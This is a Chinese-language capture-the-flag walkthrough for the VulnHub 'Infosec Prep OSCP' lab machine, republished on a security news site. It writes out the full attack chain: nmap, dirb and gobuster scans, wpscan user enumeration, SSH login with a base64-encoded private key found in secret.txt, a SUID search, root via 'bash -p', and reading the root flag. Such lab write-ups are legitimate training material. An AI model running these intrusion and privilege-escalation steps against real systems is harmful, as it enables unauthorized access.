OSCP难度靶机之Infosec Prep OSCP

admin 2022年11月25日10:41:52安全文章评论3 views832字阅读2分46秒阅读模式
虚拟机下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/
虚拟机简介:这台机器是为InfoSec Prep Discord 服务器创建的
目标:1个flag
级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Infosec Prep OSCP

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.148

查看开放22、80、33060端口

OSCP难度靶机之Infosec Prep OSCP

2、渗透测试

2.1 WEB渗透

1.站点信息收集

访问站点首页显示OSCP靶机页面

OSCP难度靶机之Infosec Prep OSCP

通过dirb进行目录扫描,发现存在WordPress

dirb http://192.168.207.148

OSCP难度靶机之Infosec Prep OSCP

2.使用wpscan进行扫描

使用wpscan未发现有用信息,仅发现一个admin账号

wpscan --url "http://192.168.207.148/" -eu

OSCP难度靶机之Infosec Prep OSCP

使用gobuster进行爆破发现存在secret.txt

gobuster dir -u http://192.168.207.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt

OSCP难度靶机之Infosec Prep OSCP

访问secret.txt中发现文件内容为base64编码

OSCP难度靶机之Infosec Prep OSCP

3.获取SSH密钥

通过base64解码,发现为SSH密钥

OSCP难度靶机之Infosec Prep OSCP

复制解密内容并保存为id_rsa,修改文件权限,并根据站点首页提示仅有一个oscp账号

OSCP难度靶机之Infosec Prep OSCP

chmod 600 id_rsa
ssh -i id_rsa [email protected]

OSCP难度靶机之Infosec Prep OSCP

2.2 主机渗透

1.查看SUID文件

find / -perm -u=s -type f 2>/dev/null

OSCP难度靶机之Infosec Prep OSCP

2.通过bash提权

通过bash提权已经获取到root权限

bash -p
id

OSCP难度靶机之Infosec Prep OSCP

查看FLAG

cat /root/flag.txt

OSCP难度靶机之Infosec Prep OSCP

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Infosec Prep OSCP

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月25日10:41:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  OSCP难度靶机之Infosec Prep OSCP http://cn-sec.com/archives/1422666.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: